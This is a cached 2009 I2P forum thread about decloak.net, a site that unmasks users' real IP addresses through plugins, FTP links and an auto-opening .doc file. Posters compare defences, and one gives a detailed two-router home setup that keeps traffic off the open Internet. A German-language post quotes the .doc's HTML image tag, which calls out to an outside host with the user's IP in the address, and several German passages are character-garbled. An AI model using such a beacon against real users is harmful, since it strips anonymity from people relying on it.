This is the eepSites cache  for 'h' from http://forum.i2p/viewtopic.php?t=3622 on 7/16/2009. The page may have changed since that time. We respect the robots.txt file and the <meta name="robots" content="noarchive"> tag to inhibit caching. VISI is neither affiliated with the authors of this page nor responsible for its content.

Jump to: Select a forum General----------------NewsDiscussion I2P----------------HowTosTechnical ProblemsInstallation ProblemsEepsite AnnounceGlossary I2P Development----------------General I2P Application SupportI2PhexI2P BitTorrentiMuleSyndieI2P-MailFeedspaceI2hostMoot PointBug Reports I2P Security----------------Security Peer Review I2P Deutsch----------------AllgemeinesP2P Off Topic----------------Yadda YaddaNon-English YaddaForum WoesProving Ground  FAQ  Search  Memberlist  Usergroups  Profile  Log in to check your private messages Log in   Register Author Message catching your IP using your browser Guest Posted: Sat Jun 13, 2009 1:17 pm  I found a website using several techniques to find your IP using your browser, even using the I2P outproxy: !!!!!! THIS MIGHT REVEAL YOUR IP: http://decloak.net/ With a proper setup, and if you do not download stuff from the internet (this website use a .doc), you still can be anonymous. I use Firefox, privoxy, the noscript addon for firefox and broke the FTP setup in firefox. Of course there is probably other techniques than those found in this website, but it is fun to try. Back to top Guest Posted: Sat Jun 13, 2009 6:31 pm  *beep*, can't the download be anonymized as well? Only if I accept the download they find out my ip-# Having seamonkey with no-script Back to top Guest Posted: Sat Jun 13, 2009 7:39 pm  The issue with the .doc is not the download: From the website, "When Microsoft Office is installed and configured to automatically open documents, a file can be returned which automatically downloads an image from the internet. This can bypass proxy settings and expose the real DNS servers of the user." In my own test, that works as well with openoffice.org Back to top HolyCrap Posted: Sat Jun 13, 2009 10:56 pm  Joined: 09 Jun 2009 Posts: 15 Well it seems an i2pfox setup passes. It didn't show any information about myself. No i didn't open the doc. I'd be reluctant to open a doc file to begin with, even more reluctant if it tries to be downloaded automatically. I don't use Microsoft Office anyway. Back to top tino Posted: Sun Jun 14, 2009 4:23 am  I2Pothead Joined: 13 Apr 2005 Posts: 121 Location: de Complete example of a secure setup which survives such an attack, see below. Anonymous wrote: I found a website using several techniques to find your IP using your browser, even using the I2P outproxy: This is true and false at the same time. - First, it only works for windows. However this type of exploit can be done with Linux as well. - Second, it only works if you have Microsoft Office installed. However there are enough fancy bugs in software out there that there are zillions of other options to do it. - Third, it needs a machine which is connected transparently to the Internet. In good Intranets the firewall will catch that issue, such that you can only do requests over the Proxy. So all this test will reveal still is the IP of the proxy, not your IP. However 99% of the home users will be transparently connected to the Internet, so this type of exploit works. It's an exploit. And it's not even a good one. All you need to have the same issus on your browser is to have the flash plugin installed, as flash - for some reason or bug - often ignores your proxy settings. So what do we learn from this? Nothing new. - If you want to stay anonymous, put the machine you work with behind a good firewall. Such a good firwall is not expensive. For example, 2m air, unconnected, is such good enough firewall. - If you decide to have some Internet connection, make sure the machine cannot reach the Internet directly. If you want to try that at home that's quite easy. See below. - Do not use the same machine for anonymous and non-anonymous things. So if you need to surf the normal way and want to use anonymous stuff in parallel, use two computers. So how to have a home brewn setting which is somewhat more bulletproof? It's quite easy and not much expensive. The IP numbers are just an example. - Instead of using one router, use two. - The first router, internal IP 192.168.4.253, is connected to your dialup/cable/dsn and works as ususal. It provides public (nonanonymous) service. For example, this can be your cable modem if you are able to disable DHCP on it (else you need to connect it to a dedicated router to fix that). - This first router can be an Internet-PC as well. This PC needs a separate internal network card (usually a second ethernet card) then. - Do not activate DHCP on this first router! For Windows, do not activate Internet Connection Sharing on the internal Ethernet interface. - If the first router is able to do more services (like proxy etc.), you are welcome to activate them. Abstain to do things which are in the anonymous areay, like file sharing for the internal network. - The second router, 192.168.4.254, is connected nowhere. Its mainly needed for providing DHCP to your internal network. If you have an wLAN access point, this can be your second router (but keep in mind, wLAN is not a private network, not even if encrypted, as wLAN is inherently insecure). - If the second router is capable of doing more service, like providing a file share, you are welcome to activate these services there. Do not activate a proxy on it which would be able to retrieve Internet pages directly. If you can run Privoxy on it (or similar), do it. - Do *not* set the default route of the second router to the first router! - DHCP on the second router can hand out IPs in the range 192.168.4.100 to 192.168.4.200 for example. - If your routers are dumb gadgets, there is no Proxy on your routers. You need at leasst two proxy services on your network: - First public proxy uses the first router to connect to the Internet. If the first router is a PC, you can try Privoxy or similar software, which is capable of listening on the internal network IP 192.168.4.253 - Second an anonymous proxy. This can be your I2P node or a Privoxy, which is able to connect to TOR. - Note that both proxies can run on the same machine. However you should consider not doing so, as else you (or your software) might get confused and accidentally use the wrong proxy setting. So keep separated things separated. - You can run I2P on your public PC (where you publically surf the Web, read your mail, etc.), however this is bad, as your public PC might get trojaned or whatever. So consider to set up a dedicated machine for I2P. For example, you can lease a vserver in Internet to install I2P there, this does not cost much (10$/Month or so). To this machine you can do an SSH tunnel (which is beyond the scope of this post) to forward the I2P proxy port to your local machine. Now, if you take your laptop, it pulls the IP from the second router via DHCP. Also it learns the default route to the second router. As the second router does not forward the packets to the first router, there simply is no direct Internet connection. So by default (this is important!) the machine stays anonymous. Also the second router is incapable to resolve DNS. So there will be no DNS leakage for computers which try to phone home. (If the default is to be non-anonymous, some software might just default, and therefor succeed, to do an Internet connect.) If you want to read the WWW, you simply give the public proxy on the laptop. If this proxy runs on your first router, this probably is 192.168.4.253:8080. If you are able to password protect your public proxy, do it. This is to make software unable to acidentally use this public proxy. If you want to stay anonymously, give your machine the anonymous proxy. This is your eeproxy on your I2P machine (perhaps 192.168.4.254:4444 if I2P runs on your second router, but this usually is not the case). Note that you cannot run I2P on your laptop directly. This is because I2P needs an Internet connection. Also note that it is difficult to run I2P behind your first router. As I2P works best with a direct internet connection. However you can configure I2P to announce some port and forward that port from your first router to your I2P node. If your first router is an Internet PC, you can run I2P there, too, but keep in mind, that it's confusing to run public and anonymous services on the same machine. In the latter case your I2P proxy is 192.168.4.253:4444 and you definitively give your public proxy a password! So here is a complete example: - A cable modem. - A windows based Internet PC running I2P node, too. - A wLAN AP. - A wLAN Laptop used to surf anonymously. Note that you often have that at home, already. - Leave the cable modem as is. - Directly connect your Internet PC to the cable modem. Leave the Interface on DHCP setting (or whatever your ISP recommends). - Do not activate Internet Connection Sharing on your Internet PC. - Connect the wLAN AP to a secondary Ethernet card of your Internet PC. Give this Interface the fixed IP 192.168.4.253 (Netmask 255.255.255.0) - Configure your wLAN AP to 192.168.4.254. Do not set a default route. - Do DHCP on the wLAN AP for, say, 192.168.4.100 to 200 - Connect your Laptop to the wLAN - Run I2P on your Internet PC, port 4444. - Run Privoxy on your Internet PC, port 8080. - If you like you can run TOR on your Internet PC. - If you like you can run Freenet on your Internet PC. - Your public proxy then is 192.168.4.253:8080 - Your anonymous proxy then is 192.168.4.253:4444 That's it. Even if you open some nasty software on your Laptop which tries hard to phone home, this will not work, as, without ICS active, your Internet PC is incapable to route packets which reach it on the internal network via the wLAN AP. So the software must go over the public proxy port. If it's password protected (I dunno if Privoxy supports that, but there is software out there which does) the software cannot guess that, and therefor will fail. Easy enough, right? It has downsides! Some games and flash games do not work over such a setup without help. They will work on your Internet PC, but not on a PC connected to the wLAN. As your Internet PC does no packet forwarding (NAT), games cannot connect to their server from the internal network. If this is an issue you need another router between your Internet-PC and the cable modem. This router must be able to do UPnP to allow I2P to open all ports (does I2P support that today?), else you are doomed to configure everything yourself. The zone between this router and your Internet-PC can be considered a DMZ in network phrases. Everything which needs transparent connection to the Internet (like games) need to live in the DMZ. Note that a proper wLAN AP could do all three things for you. However setting this up correctly is difficult, and I do not know of any stock firmware which allows such a setup (often there is a proper Linux replacement Firmware which can do it). Also there is no standard router package out there which is properly working (IPcop is not suited to that task). At my side, the "Public Internet PC" is just a Linux box. It has 3 network interfaces, one for cable, one for wLAN DMZ and one for private Intranet. It is doing NAT between wLAN and Cable, but only for some selected Internet IPs from my Intranet. It is also doing DHCP for the Intranet, as when I did the setup for over a decade ago, I did not have a secondary DHCP server back then (I did not have wLAN either, but there was a DMZ). However it does not route packets to destinations which are not allowed, so there is no flaw. But such a setup is somewhat more complicated as the one noted above. My setup works for me for over 10 years now, and it is pretty stable. If I want to surf anonymously, I take a dedicated piece of software (like Kconqueror) with a proxy setting to the anonymous network (Firefox with FoxyProxy pinned to the anonymous Proxy does it as well). My public proxy knows about .i2p and .onion, too, so I can quickly access such resources quickly without hassle - but I know I do this noanonymously then. _________________ -Tino About my fproxy see http://tino.i2p/freenet.html About my inproxy see http://i2p.to/ Alternative Seed URL http://i2pdb.tin0.de/netDb/ Back to top Gast Posted: Sun Jun 14, 2009 11:10 am  Guest tino wrote: - First, it only works for windows. However this type of exploit can be done with Linux as well. - Second, it only works if you have Microsoft Office installed. No. Es wird im WWW-Browser ein FTP-Download angestoCE8en. Diese werden oft nicht CB Code: % torify $my_ftp-downloader Das .doc beinhaltet nichts anderes als Code: <html> <img src="http://ff8c6...word.$IP.19.0.0.0.0.spy.decloak.net/decloak_office.html?cid\ =ff8c6..."/> </html> Wenn dein Kde/Gnome X-$Desktop solche Anwendungen automatisch startet, wird diese Adresse auch abgefragt! In Ooffice muss ein entsprechender Proxy-Server eingetragen sein. Back to top tino Posted: Sun Jun 14, 2009 1:40 pm  I2Pothead Joined: 13 Apr 2005 Posts: 121 Location: de Since the post cited was in German, I answer it in German, too: Gast wrote: tino wrote: - First, it only works for windows. However this type of exploit can be done with Linux as well. - Second, it only works if you have Microsoft Office installed. No. Es wird im WWW-Browser ein FTP-Download angestoCE8en. Dieser Exploit funktioniert nur, wenn der Browser falsch eingestellt ist. In sofern hast Du natCB I2P unterstCB Deshalb hatte ich mich nur auf die Attacke per Office gestCB Gast wrote: Das .doc beinhaltet nichts anderes als Code: <html> <img src="http://ff8c6...word.$IP.19.0.0.0.0.spy.decloak.net/decloak_office.html?cid\ =ff8c6..."/> </html> Wenn dein Kde/Gnome X-$Desktop solche Anwendungen automatisch startet, wird diese Adresse auch abgefragt! In Ooffice muss ein entsprechender Proxy-Server eingetragen sein. Wir stehen hier auf zwei verschiedenen Standpunkten. Ich gehe von einem strafrechtlich nicht relevanten Exploit aus, der die IP herausfindet. Das FTP-URL im Browser fCB$llt auch darunter. Wird der Exploit aber auf OO angewandt wird hier eine LCB WCB$hrend der Exploit also mit Microsoft Office nur frech ist, wird er mit Open-Office illegal. Richtig gelesen, wCB$hrend die Auswertung von URLs unter Microsoft-Office ein nicht wegdenkbarer Standard ist, bewerte ich denselben Umstand in OO als nicht wegdiskutierbaren Fehler. Der Grund ist, dass MO (im Prinzip) Windows-only ist, und somit einen anderen Anwenderkreis hat als OO. Wenn OO grundsCB$tzliche - fCB Bei MO wird das hingegen niemals ein Bug sein, weil daraus CB . o O (Nochmal gerettet, puh) O o . _________________ -Tino About my fproxy see http://tino.i2p/freenet.html About my inproxy see http://i2p.to/ Alternative Seed URL http://i2pdb.tin0.de/netDb/ Back to top Guest Posted: Mon Jun 15, 2009 12:08 am  tino, you're wrong: it does NOT only work with windows, it also works under Linux with OOo Back to top tino Posted: Mon Jun 15, 2009 1:52 pm  I2Pothead Joined: 13 Apr 2005 Posts: 121 Location: de Anonymous wrote: tino, you're wrong: it does NOT only work with windows, it also works under Linux with OOo Not quite, as there is a difference. With Microsoft Office it uses a known and documented Feature of Microsoft Office. With OO it uses a bug in OO, because that OO is "compatible" to Microsoft Office in this respect must be considererd a bug here. As the way Microsoft Office does it is the Windows way, this is not suitable to Unix. Porting Windows design flaws to Linux by copying how Microsoft did it, therefor *must* be considered a bug. Else the whole OO concept (being portable) is flawed. So, yes, this particuliar exploit works with both Office suites. With a fundamental difference: With Microsoft Office it is NOT AGAINST THE LAW to do it. With OO it IS AGAINST THE LAW to exploit that feature, at least here in Germany using bugs to gain access to protected data is prohibited by law now. As the website states, their exploit is not against the law. Therefor it only works with Microsoft Office (Thank God for logic.) It works with OO, too, but then it's another exploit, which abuses interfaces in an unlawful way. Also note that the website mounts zillions of other attacks against your privacy, not only Microsoft Office. It also uses FTP-URLs, Flash, Apple Quitime, and trainloads of other browser plugins to reveal your real IP. It does not even require that the plugin succeeds in retrieving the data! However the most attacks do not abuse things, they use officially documented features - or lack of design. Strictly speaking, this are no bugs, as browser plugins are designed to work with URLs primarily - while this is not true for Office Suites. (So only the OO feature is flawed, while the MO feature is used in a correct way. Perhaps somebody will declare that the Plugins have a bug, but I cannot see any there, also I am not much interested in that case.) Note that often the DNS query for the name in the URL is enough to reveal your real ISP, if not even your real IP (if your router does resolve DNS itself, what is quite common this days due to DNS censoring, like mounted against the people here in Germany or in Great Britain). I am pretty sure that OO sometimes will fix that bug. I am also pretty sure, that Microsoft does not see any need to change that feature ever, as this type of design is a wanted feature in Microsoft Office. Some companies even rely on that feature, so I doubt that Microsoft sees pressure to change this feature. _________________ -Tino About my fproxy see http://tino.i2p/freenet.html About my inproxy see http://i2p.to/ Alternative Seed URL http://i2pdb.tin0.de/netDb/ Back to top Guest Posted: Mon Jun 15, 2009 9:24 pm  if using it with OOo is against the law and they say they don't do anything against the law, then the conclusion is NOT that is does not work under OOo, but rather that they are lying - maybe unknowingly, given that it DOES work with OOo, and if you go to this site, with your linux box with OOo installed, and you dl and open that file, you'll see that without further security changes, it will work: They'll get your real IP. Checked and proven. Back to top tino Posted: Tue Jun 16, 2009 12:53 am  I2Pothead Joined: 13 Apr 2005 Posts: 121 Location: de Didn't I write this with: tino wrote: However this type of exploit can be done with Linux as well. tino wrote: However there are enough fancy bugs in software out there that there are zillions of other options to do it. Do I really need to mention OO in particuliar if there are zillions of other ways to have a .doc or anything else come out fatal? The fact still holds: This particular exploit only is possible, in a lawful manner (that's what they claim on their web page), with Windows and Microsoft Office installed. On other platforms together with some other applications (this bug is certainly not only in OO) this exploit still *works*, but (most time) becomes unlawful there. I did not mention this precisely but it now, hopefully, is corrected. Sorry for me, being human and unable to express things flawlessly. And this is my last post to this thread now, as it already is killing time. _________________ -Tino About my fproxy see http://tino.i2p/freenet.html About my inproxy see http://i2p.to/ Alternative Seed URL http://i2pdb.tin0.de/netDb/ Back to top Display posts from previous: All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 Year Oldest FirstNewest First  All times are GMT View next topic View previous topic Page 1 of 1 forum.i2p Forum Index -> Discussion   You can post new topics in this forum You can reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum (http://www.mikelothar.com/community) Forum software: php BB (http://www.php bb.com) v2 © 1976 php BB Group